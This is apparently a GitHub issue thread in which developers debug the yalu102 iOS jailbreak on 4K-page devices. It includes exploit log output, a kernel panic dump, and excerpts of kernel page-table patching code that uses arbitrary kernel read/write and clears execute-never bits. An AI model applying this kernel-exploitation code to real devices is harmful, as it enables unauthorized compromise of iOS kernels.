4K Device Support

[ghost]

Support needed for 4K devices. ( In more understandable terms, "old" devices )

[ninjaprawn]

Is it possible if we can get an explanation on what defines a "4K device", "16k device", etc.?

[ninjaprawn]

After a quick google search, I have a feeling it might have to do with the size of the memory pages (http://stackoverflow.com/questions/21552747/strange-behavior-on-64bit-ios-devices-when-retrieving-vm-statistics/33574804)

[shdkpr2008]

 /*
 * page size -> used to know how many pages the ipc ports zone will use per block so we can guess task port addresses
 >*/
 .....
int page_size = getpagesize(); 
 .....
   if (page_size == 0x1000)  // running with 4k pages
   .......
   else if (page_size == 0x4000)  // running with 16k pages
 .....

Yes, 4K and 16K are memory pages per block of memory allocated to zones. Reading a comment and few lines of code from Ian Beer's mach_portal (kernel_sploit.c) also explains what is meant by 4K and 16K and for what it is used.

Original article & code: https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c2

[meyer9]

How are we supposed to debug a kernel panic on these devices?

[meyer9]

Here's the device log for an attempted JB on an iP6:

Jan 26 15:51:01 Julians-iPhone yalu102[540] <Notice>: found corruption 38403
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: found kernel text at fffffff022c04000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: got tfp0 -> e07
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: found procs at fffffff004c56850
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __TEXT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __DATA_CONST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __TEXT_EXEC
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __KLD
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __LAST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __DATA
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_TEXT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_TEXT_EXEC
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_DATA
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_DATA_CONST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_LINKEDIT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_INFO
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __LINKEDIT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: fffffff021ccc000 - fffffff023494000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: ffffffff03cd4000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: fffffff022c715a0
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: pmap: fffffff023120850

Could panic here: https://github.com/kpwn/yalu102/blob/master/yalu102/jailbreak.m#L266

Possibly change that to 0x1000?

[ghost]

@meyer9 I can test?

[meyer9]

sure, but I'm just taking a wild guess here

[meyer9]

alright, that helped I think?

2017-01-26 16:11:45.462718 yalu102[252:9458] debug: test point 1
2017-01-26 16:11:45.462881 yalu102[252:9458] debug: test point 2
2017-01-26 16:11:45.462966 yalu102[252:9458] debug: test point 3
2017-01-26 16:11:45.463140 yalu102[252:9458] debug: test point 4
2017-01-26 16:11:45.463253 yalu102[252:9458] debug: test point 5
2017-01-26 16:11:45.463326 yalu102[252:9458] debug: test point 6
2017-01-26 16:11:45.463387 yalu102[252:9458] debug: test point 7
2017-01-26 16:11:45.463568 yalu102[252:9458] got phys at 802dd2000 for virt fffffff00088f000
2017-01-26 16:11:45.463692 yalu102[252:9458] found cpu 0
2017-01-26 16:11:45.463725 yalu102[252:9458] found physz: fffffff012693000
2017-01-26 16:11:45.463806 yalu102[252:9458] found cpu 1
2017-01-26 16:11:45.463873 yalu102[252:9458] found physz: fffffff012693000
2017-01-26 16:11:45.463997 yalu102[252:9458] fffffff012793574 - fffffff0127933a8
2017-01-26 16:11:45.465377 yalu102[252:9458] ttbr0: 802ab9000 fffffff012671590

[ghost]

Still gets stuck though :P

[ghost]

It got further @meyer9

[meyer9]

yeah

2017-01-26 16:19:00.212362 yalu102[222:4858] debug: test point 8
2017-01-26 16:19:00.212397 yalu102[222:4858] debug: test point 9
2017-01-26 16:19:00.212481 yalu102[222:4858] debug: test point 10
2017-01-26 16:19:00.212515 yalu102[222:4858] debug: test point 2
2017-01-26 16:19:00.213501 yalu102[222:4858] got a cpacr

https://github.com/kpwn/yalu102/pull/26#issuecomment-275486662

[ghost]

@meyer9 we need to fix whats causing corruption ;/ found corruption XXXXX

[meyer9]

that's not normal?

[ghost]

I didn't think so, it might be? @meyer9

[meyer9]

I believe it is. The problem stems from this function:

    pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\
        uint64_t tte = ReadAnywhere64(tte_addr);\
        if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\
            NSLog(@"breakup!");\
            uint64_t fakep = physalloc(PSZ);\
            uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\
            TTE_SETB(tte, TTE_IS_TABLE_MASK);\
            for (int i = 0; i < PSZ/8; i++) {\
                TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\
                WriteAnywhere64(fakep+i*8, tte);\
            }\
            TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\
            WriteAnywhere64(tte_addr, tte);\
        }\
        uint64_t newt = physalloc(PSZ);\
        copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\
        copyout(newt, bbuf, PSZ);\
        TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\
        TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\
        TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\
        WriteAnywhere64(tte_addr, tte);\
        NSLog(@"level %llx - %llx", tte_addr,              TTE_GET(tte, TTE_PHYS_VALUE_MASK));\
    }, level1_table, 2);

[ghost]

Doesn't look like an easy fix

[Hexeption]

I'm at the same place as you @meyer9

[meyer9]

Check out pte_stuff

[meyer9]

These possibly need adjusting?

typedef union VMA_4K {
    struct {
        uint64_t block_off : 12;
        uint64_t level3_index : 9;
        uint64_t level2_index : 9;
        uint64_t level1_index : 9;
        uint64_t level0_index : 9;
        uint64_t ttbr_selector : 16;
    } __attribute__((packed)) vm_info;
    uint64_t vmaddr;
} VMA_4K;

[ghost]

Tell me if you get the correct values 👍

[ghost]

Just an after thought if those are the 16K device strings or same as won't the 4K values be a quater of the 16K values ?

[meyer9]

Probably not since all of them aren't divisible by 4, but I have no clue

[ghost]

I'm guessing if it was an easy fix it would already have been added :p

[meyer9]

Probably, but it's still fun to look

[Hexeption]

Yeah

[ghost]

Just leave a comment if you find / fix something else

[meyer9]

If I put NSLog(@"calling back %llu %d", tteaddr, level); just before pagestuff_64_callback in pte_stuff.h, I get calling back 18446743970915550384 2. But it does not run the callback...

[meyer9]

Can someone do this on a verified working JB and see what it gives them? The level may be different.

[ghost]

Ive been trying to look for successful logs but haven't found them

[DarknesGaming]

I haven't tried this yet, and that's because I don't have a jailbreak working. Despite my lack of memory-management knowledge, I'll see if I can do anything.

[DarknesGaming]

I just forgot that I didn't plug in my iPhone yet. Also, @Mila432's latest commit does not support the TSMC iPhone 6s and SE (which has S8003 at the end, and not S8000).

[DarknesGaming]

Just tried to run the jailbreak. No output. Just a crash and reboot.

[meyer9]

On what device?

I'd like someone to add that debug line I described above and paste the output on a working JB.

[DarknesGaming]

The iPhone 6.

[meyer9]

Got it. That's pretty expected. We're looking for comparison with a different device.

[DarknesGaming]

I'll try to fix this problem. At the same time, I'll be trying to find a way to make this code a bit easier to read (and this is by using more "if" statements with u.machine to better define which set of offsets are for which device).

[meyer9]

kernel panic:

panic(cpu 1 caller 0xfffffff01d3969e8): Kernel data abort. (saved state: 0xfffffff16943b350)
      x0: 0xfffffff001e274d8  x1:  0xffffffe81b600748  x2:  0x0000000000000000  x3:  0xfffffff001e274d8
      x4: 0xfffffff16943b838  x5:  0xfffffff16943b988  x6:  0x0000000010000003  x7:  0xfffffff004b4bf00
      x8: 0xfffffff01d79a868  x9:  0xfffffff01d79a868  x10: 0xfffffff001e274d8  x11: 0xfffffff001e274d8
      x12: 0xfffffff01d766380 x13: 0x00000000000014f9  x14: 0xaaaaaaaaaaaaaaab  x15: 0x0000000000000018
      x16: 0xfffffff01d748f10 x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0xfffffff11cd5a920
      x20: 0x0000000000000008 x21: 0xfffffff001e274d8  x22: 0xffffffe81b600748  x23: 0x0000000000000020
      x24: 0x0000000000000000 x25: 0xffffffe81b600750  x26: 0xffffffe81b600748  x27: 0x0000000000000001
      x28: 0xfffffff16943b838 fp:  0xfffffff16943b6a0  lr:  0xfffffff01d32f9bc  sp:  0xfffffff16943b6a0
      pc:  0xfffffff01d28e034 cpsr: 0x60000304         esr: 0x96000004          far: 0xffffffe81b600748

Debugger message: panic
Memory ID: 0x1
OS version: 14C92
Kernel version: Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4\/RELEASE_ARM64_T7000
KernelCache UUID: E241E5E5848A662ECF7751CB6E36E94D
iBoot version: iBoot-3406.30.8
secure boot?: YES
Paniclog version: 6
Kernel slide:     0x0000000016200000
Kernel text base: 0xfffffff01d204000
Epoch Time:        sec       usec
  Boot    : 0x588a933b 0x000b0c5c
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x588a93ad 0x000729f0

Panicked task 0xfffffff00253a000: 8941 pages, 6 threads: pid 224: yalu102
Panicked thread: 0xfffffff002b534f0, backtrace: 0xfffffff16943af90
          lr: 0xfffffff01d39bbc0  fp: 0xfffffff16943b000
          lr: 0xfffffff01d2b6e70  fp: 0xfffffff16943b050
          lr: 0xfffffff01d3969e8  fp: 0xfffffff16943b240
          lr: 0xfffffff01d39709c  fp: 0xfffffff16943b330
          lr: 0xfffffff01d2901f0  fp: 0xfffffff16943b340
          lr: 0xfffffff01d28e034  fp: 0xfffffff16943b6a0
          lr: 0xfffffff01d32f9bc  fp: 0xfffffff16943b6e0
          lr: 0xfffffff01d33cf70  fp: 0xfffffff16943b820
          lr: 0xfffffff01d365f20  fp: 0xfffffff16943b870
          lr: 0xfffffff01d304f1c  fp: 0xfffffff16943b8b0
          lr: 0xfffffff01d29ef18  fp: 0xfffffff16943ba20
          lr: 0xfffffff01d2af3c8  fp: 0xfffffff16943bad0
          lr: 0xfffffff01d3983f0  fp: 0xfffffff16943bba0
          lr: 0xfffffff01d396d0c  fp: 0xfffffff16943bc90
          lr: 0xfffffff01d2901f0  fp: 0xfffffff16943bca0

[DarknesGaming]

I can tell this is a kernel panic. What does the rest mean?

[meyer9]

I believe they are the values of the registers?

[meyer9]

Also, the tte_addr is thought to be ffffffe8110004b0 according to the callback where it fails.

[meyer9]

I think we're looking at this wrong. It probably fails earlier and then only crashes later since there should be no reason it's crashing at that specific spot.

[DarknesGaming]

I'm not sure how to look at this. I only learned a little bit of memory management, but that was because I was learning how a buffer overflow works.

[DarknesGaming]

Quick question: How do I access the device logs?

[Hexeption]

When you run the app with XCode Open the Console

[DarknesGaming]

I'm getting no output from the console.

[meyer9]

are you running from Xcode?

[Hexeption]

did you run the app with xcode and let it open automatically?

[meyer9]

It's also in Impactor under Device > Watch Log

[DarknesGaming]

No. I set Xcode to not run the app automatically, but to wait for me to launch the app to start debugging.

[masbog]

same as me on my iPad Air 2,

sysname: Darwin nodename: Augustas-iPad-Air-2-Silver release: 16.3.0 version: Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001 machine: iPad5,3 2017-01-27 11:49:16.463734 yalu102[224:8076] found corruption 38303 2017-01-27 11:49:16.774413 yalu102[224:8076] found kernel text at fffffff008604000 2017-01-27 11:49:16.776410 yalu102[224:8076] got tfp0 -> 38403 2017-01-27 11:49:16.777854 yalu102[224:8076] found procs at fffffff10d428c18 2017-01-27 11:49:16.781215 yalu102[224:8076] seg: TEXT 2017-01-27 11:49:16.781268 yalu102[224:8076] seg: DATA_CONST 2017-01-27 11:49:16.781305 yalu102[224:8076] seg: TEXT_EXEC 2017-01-27 11:49:16.781337 yalu102[224:8076] seg: KLD 2017-01-27 11:49:16.781371 yalu102[224:8076] seg: LAST 2017-01-27 11:49:16.781404 yalu102[224:8076] seg: DATA 2017-01-27 11:49:16.781435 yalu102[224:8076] seg: PRELINK_TEXT 2017-01-27 11:49:16.781484 yalu102[224:8076] seg: PLK_TEXT_EXEC 2017-01-27 11:49:16.781518 yalu102[224:8076] seg: PRELINK_DATA 2017-01-27 11:49:16.781548 yalu102[224:8076] seg: PLK_DATA_CONST 2017-01-27 11:49:16.781578 yalu102[224:8076] seg: PLK_LINKEDIT 2017-01-27 11:49:16.781610 yalu102[224:8076] seg: PRELINK_INFO 2017-01-27 11:49:16.781640 yalu102[224:8076] seg: __LINKEDIT 2017-01-27 11:49:16.781666 yalu102[224:8076] fffffff007670000 - fffffff008ea0000 2017-01-27 11:49:16.815980 yalu102[224:8076] ffffffff045d0000 2017-01-27 11:49:16.852228 yalu102[224:8076] fffffff0086715a0 2017-01-27 11:49:16.887973 yalu102[224:8076] pmap: fffffff008b20850 2017-01-27 11:49:16.924006 yalu102[224:8076] got phys at 0 for virt fffffff1b7790000 2017-01-27 11:49:16.924117 yalu102[224:8076] found cpu 0 2017-01-27 11:49:16.924150 yalu102[224:8076] found physz: fffffff008693000 2017-01-27 11:49:16.924188 yalu102[224:8076] found cpu 1 2017-01-27 11:49:16.924218 yalu102[224:8076] found physz: fffffff008693000 2017-01-27 11:49:16.924255 yalu102[224:8076] found cpu 2 2017-01-27 11:49:16.924282 yalu102[224:8076] found physz: fffffff008693000 2017-01-27 11:49:16.924323 yalu102[224:8076] fffffff008793714 - fffffff008793548 2017-01-27 11:49:16.925590 yalu102[224:8076] ttbr0: 802ac5000 fffffff008671590 2017-01-27 11:49:16.926011 yalu102[224:8076] got a cpacr